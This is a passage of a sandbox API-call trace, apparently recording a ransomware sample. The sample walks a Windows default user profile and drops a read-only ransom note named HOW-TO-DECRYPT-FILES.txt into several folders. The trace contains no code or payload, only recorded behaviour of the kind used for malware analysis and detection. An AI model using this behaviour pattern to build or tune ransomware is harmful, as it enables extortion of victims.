SetErrorMode (uMode=0x1) returned 0x0 [0048.825] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\links\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.825] GetLastError () returned 0x5 [0048.825] SetErrorMode (uMode=0x0) returned 0x1 [0048.826] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Links\\Downloads.lnk", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Links\\Downloads.lnk", lpFilePart=0x0) returned 0x24 [0048.826] GetLastError () returned 0x5 [0048.826] SetErrorMode (uMode=0x1) returned 0x0 [0048.826] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Links\\Downloads.lnk" (normalized: "c:\\users\\default\\links\\downloads.lnk"), fInfoLevelId=0x0, lpFileInformation=0x1d2147c | out: lpFileInformation=0x1d2147c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c426d0, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c426d0, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x280d3328, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36e)) returned 1 [0048.826] GetLastError () returned 0x5 [0048.826] SetErrorMode (uMode=0x0) returned 0x1 [0048.846] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Links\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Links\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0048.846] GetLastError () returned 0x5 [0048.846] SetErrorMode (uMode=0x1) returned 0x0 [0048.846] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\links\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.847] GetLastError () returned 0x5 [0048.847] SetErrorMode (uMode=0x0) returned 0x1 [0048.847] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Links\\RecentPlaces.lnk", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Links\\RecentPlaces.lnk", lpFilePart=0x0) returned 0x27 [0048.847] GetLastError () returned 0x5 [0048.847] SetErrorMode (uMode=0x1) returned 0x0 [0048.847] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default\\links\\recentplaces.lnk"), fInfoLevelId=0x0, lpFileInformation=0x1b403e0 | out: lpFileInformation=0x1b403e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c426d0, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c426d0, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x28087067, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x16b)) returned 1 [0048.848] GetLastError () returned 0x5 [0048.848] SetErrorMode (uMode=0x0) returned 0x1 [0048.848] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Links\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Links\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0048.848] GetLastError () returned 0x5 [0048.848] SetErrorMode (uMode=0x1) returned 0x0 [0048.848] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\links\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.848] GetLastError () returned 0x5 [0048.848] SetErrorMode (uMode=0x0) returned 0x1 [0048.849] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Local Settings", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Local Settings", lpFilePart=0x0) returned 0x1f [0048.849] GetLastError () returned 0x5 [0048.849] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.849] GetLastError () returned 0x5 [0048.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.849] GetLastError () returned 0x5 [0048.849] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Local Settings", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Local Settings", lpFilePart=0x0) returned 0x1f [0048.849] GetLastError () returned 0x5 [0048.849] SetErrorMode (uMode=0x1) returned 0x0 [0048.849] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Local Settings\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0048.849] GetLastError () returned 0x5 [0048.849] SetErrorMode (uMode=0x0) returned 0x1 [0048.850] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Music", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Music", lpFilePart=0x0) returned 0x16 [0048.850] GetLastError () returned 0x5 [0048.850] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.850] GetLastError () returned 0x5 [0048.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.850] GetLastError () returned 0x5 [0048.850] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Music", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Music", lpFilePart=0x0) returned 0x16 [0048.850] GetLastError () returned 0x5 [0048.850] SetErrorMode (uMode=0x1) returned 0x0 [0048.850] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Music\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.850] GetLastError () returned 0x5 [0048.850] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.850] GetLastError () returned 0x5 [0048.850] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.850] GetLastError () returned 0x5 [0048.850] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.850] GetLastError () returned 0x12 [0048.850] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.850] SetErrorMode (uMode=0x0) returned 0x1 [0048.850] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Music", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Music", lpFilePart=0x0) returned 0x16 [0048.850] GetLastError () returned 0x12 [0048.850] SetErrorMode (uMode=0x1) returned 0x0 [0048.850] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Music\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.851] GetLastError () returned 0x12 [0048.851] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.851] GetLastError () returned 0x12 [0048.851] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.851] GetLastError () returned 0x12 [0048.851] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.851] GetLastError () returned 0x12 [0048.851] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.851] SetErrorMode (uMode=0x0) returned 0x1 [0048.851] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Music\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Music\\desktop.ini", lpFilePart=0x0) returned 0x22 [0048.851] GetLastError () returned 0x12 [0048.851] SetErrorMode (uMode=0x1) returned 0x0 [0048.851] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Music\\desktop.ini" (normalized: "c:\\users\\default\\music\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1b5fe1c | out: lpFileInformation=0x1b5fe1c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c1c570, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c1c570, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27ccee00, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0048.851] GetLastError () returned 0x12 [0048.851] SetErrorMode (uMode=0x0) returned 0x1 [0048.852] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0048.852] GetLastError () returned 0x12 [0048.852] SetErrorMode (uMode=0x1) returned 0x0 [0048.852] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.854] GetLastError () returned 0x0 [0048.854] GetFileType (hFile=0x184) returned 0x1 [0048.854] SetErrorMode (uMode=0x0) returned 0x1 [0048.854] GetFileType (hFile=0x184) returned 0x1 [0048.854] WriteFile (in: hFile=0x184, lpBuffer=0x1b7b8c0*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1b7b8c0*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0048.855] GetLastError () returned 0x0 [0048.855] CloseHandle (hObject=0x184) returned 1 [0048.855] GetLastError () returned 0x0 [0048.855] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0048.855] GetLastError () returned 0x0 [0048.855] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Music\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.855] GetLastError () returned 0x0 [0048.855] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\My Documents", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\My Documents", lpFilePart=0x0) returned 0x1d [0048.855] GetLastError () returned 0x0 [0048.855] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.855] GetLastError () returned 0x0 [0048.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.855] GetLastError () returned 0x0 [0048.855] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\My Documents", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\My Documents", lpFilePart=0x0) returned 0x1d [0048.855] GetLastError () returned 0x0 [0048.855] SetErrorMode (uMode=0x1) returned 0x0 [0048.855] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\My Documents\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0048.855] GetLastError () returned 0x5 [0048.856] SetErrorMode (uMode=0x0) returned 0x1 [0048.856] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NetHood", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NetHood", lpFilePart=0x0) returned 0x18 [0048.856] GetLastError () returned 0x5 [0048.856] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.856] GetLastError () returned 0x5 [0048.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.856] GetLastError () returned 0x5 [0048.856] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NetHood", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\NetHood", lpFilePart=0x0) returned 0x18 [0048.856] GetLastError () returned 0x5 [0048.856] SetErrorMode (uMode=0x1) returned 0x0 [0048.856] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\NetHood\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0048.856] GetLastError () returned 0x5 [0048.857] SetErrorMode (uMode=0x0) returned 0x1 [0048.857] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Pictures", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Pictures", lpFilePart=0x0) returned 0x19 [0048.857] GetLastError () returned 0x5 [0048.857] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.857] GetLastError () returned 0x5 [0048.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.857] GetLastError () returned 0x5 [0048.857] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Pictures", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Pictures", lpFilePart=0x0) returned 0x19 [0048.857] GetLastError () returned 0x5 [0048.857] SetErrorMode (uMode=0x1) returned 0x0 [0048.857] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.858] GetLastError () returned 0x5 [0048.858] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.858] GetLastError () returned 0x5 [0048.858] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.858] GetLastError () returned 0x5 [0048.858] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.858] GetLastError () returned 0x12 [0048.858] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.858] SetErrorMode (uMode=0x0) returned 0x1 [0048.858] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Pictures", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Pictures", lpFilePart=0x0) returned 0x19 [0048.858] GetLastError () returned 0x12 [0048.858] SetErrorMode (uMode=0x1) returned 0x0 [0048.858] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.858] GetLastError () returned 0x12 [0048.858] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.858] GetLastError () returned 0x12 [0048.858] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.858] GetLastError () returned 0x12 [0048.858] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.858] GetLastError () returned 0x12 [0048.858] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.858] SetErrorMode (uMode=0x0) returned 0x1 [0048.858] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Pictures\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Pictures\\desktop.ini", lpFilePart=0x0) returned 0x25 [0048.858] GetLastError () returned 0x12 [0048.858] SetErrorMode (uMode=0x1) returned 0x0 [0048.858] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Pictures\\desktop.ini" (normalized: "c:\\users\\default\\pictures\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1b802d4 | out: lpFileInformation=0x1b802d4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c1c570, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c1c570, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27c5c9df, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0048.859] GetLastError () returned 0x12 [0048.859] SetErrorMode (uMode=0x0) returned 0x1 [0048.859] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Pictures\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Pictures\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0048.859] GetLastError () returned 0x12 [0048.859] SetErrorMode (uMode=0x1) returned 0x0 [0048.859] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\pictures\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.859] GetLastError () returned 0x0 [0048.859] GetFileType (hFile=0x184) returned 0x1 [0048.859] SetErrorMode (uMode=0x0) returned 0x1 [0048.859] GetFileType (hFile=0x184) returned 0x1 [0048.859] WriteFile (in: hFile=0x184, lpBuffer=0x1b9bd84*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1b9bd84*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0048.860] GetLastError () returned 0x0 [0048.860] CloseHandle (hObject=0x184) returned 1 [0048.860] GetLastError () returned 0x0 [0048.860] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Pictures\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Pictures\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0048.860] GetLastError () returned 0x0 [0048.861] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Pictures\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.861] GetLastError () returned 0x0 [0048.861] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\PrintHood", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\PrintHood", lpFilePart=0x0) returned 0x1a [0048.861] GetLastError () returned 0x0 [0048.861] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.861] GetLastError () returned 0x0 [0048.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.861] GetLastError () returned 0x0 [0048.861] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\PrintHood", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\PrintHood", lpFilePart=0x0) returned 0x1a [0048.861] GetLastError () returned 0x0 [0048.861] SetErrorMode (uMode=0x1) returned 0x0 [0048.861] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\PrintHood\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0048.861] GetLastError () returned 0x5 [0048.862] SetErrorMode (uMode=0x0) returned 0x1 [0048.862] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Recent", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Recent", lpFilePart=0x0) returned 0x17 [0048.862] GetLastError () returned 0x5 [0048.862] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.862] GetLastError () returned 0x5 [0048.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.862] GetLastError () returned 0x5 [0048.862] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Recent", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Recent", lpFilePart=0x0) returned 0x17 [0048.862] GetLastError () returned 0x5 [0048.862] SetErrorMode (uMode=0x1) returned 0x0 [0048.862] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Recent\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0048.862] GetLastError () returned 0x5 [0048.863] SetErrorMode (uMode=0x0) returned 0x1 [0048.863] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Saved Games", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Saved Games", lpFilePart=0x0) returned 0x1c [0048.863] GetLastError () returned 0x5 [0048.863] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.863] GetLastError () returned 0x5 [0048.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.863] GetLastError () returned 0x5 [0048.863] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Saved Games", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Saved Games", lpFilePart=0x0) returned 0x1c [0048.863] GetLastError () returned 0x5 [0048.863] SetErrorMode (uMode=0x1) returned 0x0 [0048.863] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.863] GetLastError () returned 0x5 [0048.863] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.863] GetLastError () returned 0x5 [0048.863] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.863] GetLastError () returned 0x5 [0048.863] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.863] GetLastError () returned 0x12 [0048.863] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.863] SetErrorMode (uMode=0x0) returned 0x1 [0048.863] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Saved Games", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Saved Games", lpFilePart=0x0) returned 0x1c [0048.863] GetLastError () returned 0x12 [0048.863] SetErrorMode (uMode=0x1) returned 0x0 [0048.863] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.864] GetLastError () returned 0x12 [0048.864] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.864] GetLastError () returned 0x12 [0048.864] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.864] GetLastError () returned 0x12 [0048.864] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.864] GetLastError () returned 0x12 [0048.864] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.864] SetErrorMode (uMode=0x0) returned 0x1 [0048.864] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Saved Games\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Saved Games\\desktop.ini", lpFilePart=0x0) returned 0x28 [0048.864] GetLastError () returned 0x12 [0048.864] SetErrorMode (uMode=0x1) returned 0x0 [0048.864] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Saved Games\\desktop.ini" (normalized: "c:\\users\\default\\saved games\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ba07e4 | out: lpFileInformation=0x1ba07e4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c1c570, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c1c570, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27fa2825, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0048.864] GetLastError () returned 0x12 [0048.864] SetErrorMode (uMode=0x0) returned 0x1 [0048.864] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Saved Games\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Saved Games\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x35 [0048.864] GetLastError () returned 0x12 [0048.864] SetErrorMode (uMode=0x1) returned 0x0 [0048.864] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\saved games\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.865] GetLastError () returned 0x0 [0048.865] GetFileType (hFile=0x184) returned 0x1 [0048.865] SetErrorMode (uMode=0x0) returned 0x1 [0048.865] GetFileType (hFile=0x184) returned 0x1 [0048.865] WriteFile (in: hFile=0x184, lpBuffer=0x1bbc490*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1bbc490*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0048.866] GetLastError () returned 0x0 [0048.866] CloseHandle (hObject=0x184) returned 1 [0048.866] GetLastError () returned 0x0 [0048.866] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Saved Games\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Saved Games\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x35 [0048.866] GetLastError () returned 0x0 [0048.866] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Saved Games\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.866] GetLastError () returned 0x0 [0048.866] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Searches\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.872] GetLastError () returned 0x0 [0048.872] 